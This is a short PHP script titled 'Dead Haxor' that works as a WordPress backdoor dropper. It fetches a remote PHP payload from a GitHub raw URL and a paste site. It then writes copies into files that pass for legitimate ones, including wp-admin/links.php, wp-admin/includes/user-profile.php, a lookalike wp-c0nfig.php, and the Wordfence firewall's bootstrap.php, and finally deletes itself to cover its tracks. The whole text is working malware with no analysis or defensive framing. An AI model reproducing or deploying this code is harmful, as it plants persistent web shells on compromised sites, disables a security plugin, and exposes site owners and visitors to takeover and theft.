<?php echo "<title>Dead Haxor</title>
";function http_get($url){$im=curl_init($url);curl_setopt($im,CURLOPT_RETURNTRANSFER,1);curl_setopt($im,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($im,CURLOPT_FOLLOWLOCATION,1);curl_setopt($im,CURLOPT_HEADER,0);return curl_exec($im);curl_close($im);}$check=$_SERVER["DOCUMENT_ROOT"]."/wp-admin/links.php";$text=http_get("https://raw.githubusercontent.com/v3n0miq/v3n0m/main/v3n0m.php");$open=fopen($check,"w");fwrite($open,$text);fclose($open);if(file_exists($check)){echo$check."</br>";}else echo"not exits";echo"done .
 ";$check2=$_SERVER["DOCUMENT_ROOT"]."/wp-admin/includes/user-profile.php";$text2=http_get("https://raw.githubusercontent.com/v3n0miq/v3n0m/main/v3n0m.php");$open2=fopen($check2,"w");fwrite($open2,$text2);fclose($open2);if(file_exists($check2)){echo$check2."</br>";}else echo"not exits";echo"done .
 ";$check3=$_SERVER["DOCUMENT_ROOT"]."/wp-admin/css/common.php";$text3=http_get("https://raw.githubusercontent.com/v3n0miq/v3n0m/main/v3n0m.php");$open3=fopen($check3,"w");fwrite($open3,$text3);fclose($open3);if(file_exists($check3)){echo$check3."</br>";}else echo"not exits";echo"done .
 ";$check5=$_SERVER["DOCUMENT_ROOT"]."/wp-content/plugins/wordfence/waf/bootstrap.php";$text5=http_get("https://raw.githubusercontent.com/v3n0miq/v3n0m/main/v3n0m.php");$open5=fopen($check5,"w");fwrite($open5,$text5);fclose($open5);if(file_exists($check5)){echo$check5."</br>";}else echo"not exits";echo"done .
 ";$check12=$_SERVER["DOCUMENT_ROOT"]."/wp-content/themes/wp-tinymce.php";$text12=http_get("https://raw.githubusercontent.com/v3n0miq/v3n0m/main/v3n0m.php");$open12=fopen($check12,"w");fwrite($open12,$text12);fclose($open12);if(file_exists($check12)){echo$check12."</br>";}else echo"not exits";echo"done .
 ";$check13=$_SERVER["DOCUMENT_ROOT"]."/wp-c0nfig.php";$text13=http_get("https://0paste.com/351486.txt");$open13=fopen($check13,"w");fwrite($open13,$text13);fclose($open13);if(file_exists($check13)){echo$check13."</br>";}else echo"not exits";echo"done .
 ";$check15=$_SERVER["DOCUMENT_ROOT"]."/wp-content/themes/editor.php";$text15=http_get("https://raw.githubusercontent.com/v3n0miq/v3n0m/main/v3n0m.php");$open15=fopen($check15,"w");fwrite($open15,$text15);fclose($open15);if(file_exists($check15)){echo$check15."</br>";}else echo"not exits";echo"done . 
 ";@unlink(__FILE__);
?>
